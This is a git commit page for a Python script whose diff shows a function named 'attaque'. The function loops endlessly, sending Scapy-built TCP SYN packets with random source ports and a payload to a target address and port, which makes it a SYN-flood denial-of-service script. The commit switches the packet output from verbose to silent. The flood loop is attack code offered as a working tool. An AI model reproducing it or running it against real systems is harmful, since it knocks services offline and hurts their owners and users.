Saataa andagii !
This commit is contained in:
parent
5b0309a4e8
commit
1e154caef8
2 changed files with 19 additions and 2 deletions
|
@ -20,7 +20,7 @@ def attaque():
|
|||
while True:
|
||||
requete = L[r.randint(0, 2)]
|
||||
paquet = IP(dst=adresse) / TCP(dport=port, sport=RandShort(), flags="S") / Raw(load=requete)
|
||||
sr1(paquet, verbose=True)
|
||||
sr1(paquet, verbose=False)
|
||||
|
||||
if __name__ == "__main__":
|
||||
attaque()
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue